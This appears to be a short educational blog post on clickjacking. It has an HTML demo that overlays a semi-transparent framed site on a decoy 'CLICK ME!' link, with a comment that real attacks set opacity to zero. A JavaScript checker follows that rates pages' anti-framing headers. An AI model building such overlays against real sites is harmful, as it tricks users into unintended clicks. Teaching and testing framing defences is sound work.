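Clickjacking is a type of web attack; for details, see http://drops.wooyun.org/papers/104
I had never really understood how it is actually carried out. By chance I came across a practical example that I found very instructive, so I am sharing it here. (I won't explain the code; for solutions, see the link above as well.)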
<html>
<head>
<style>
/* The framed page is stretched over the decoy content from the top-left corner */
iframe {
  width:800px;
  height:800px;
  position:absolute;
  top:0;
  left:0;
  filter:alpha(opacity=30); /* in real life opacity=0 */
  opacity:0.5;
}
</style>
</head>
<body>
<div>Click on the link to go shopping now:</div>
<iframe src="http://www.baidu.com"></iframe>
<!-- Decoy link positioned at a fixed offset inside the framed area -->
<strong><a href="http://www.bing.com/" target="_blank" height="200px" style="position:relative;left:380px;top:140px; z-index:999">CLICK ME!</a></strong>
<div>Buy! Buy! Buy!</div>
</body>
</html>
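The demo above only works if the framed site lets other origins embed it. As an added example (not part of the original post or of the linked article), the following JavaScript classifies a response's anti-framing protection from its X-Frame-Options and Content-Security-Policy frame-ancestors headers; the function names and sample headers are constructed for illustration.

```javascript
// Added example: classify a response's anti-framing protection from its headers.
// All names and sample headers below are constructed for illustration.

// Return the lowercase source list of CSP frame-ancestors, or null if absent.
function frameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Verdicts: 'blocked' (no framing), 'same-origin', 'allowlist', 'unprotected'.
function framingVerdict(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value);
  }

  // An enforced frame-ancestors directive takes precedence over X-Frame-Options.
  // The Report-Only header is deliberately not consulted: it enforces nothing.
  const sources = frameAncestors(h['content-security-policy'] || '');
  if (sources !== null) {
    if (sources.includes('*')) return 'unprotected';
    if (sources.every((s) => s === "'none'")) return 'blocked';
    if (sources.every((s) => s === "'self'")) return 'same-origin';
    return 'allowlist';
  }

  // Legacy header: only DENY and SAMEORIGIN are honoured by current browsers;
  // ALLOW-FROM and unknown values are ignored, leaving the page framable.
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'blocked';
  if (xfo === 'SAMEORIGIN') return 'same-origin';
  return 'unprotected';
}

// Constructed sample responses.
const samples = [
  {},
  { 'X-Frame-Options': 'DENY' },
  { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
];
for (const s of samples) console.log(JSON.stringify(s), '->', framingVerdict(s));
```

A verdict of 'unprotected' means a page like the demo above can still load the response inside its iframe.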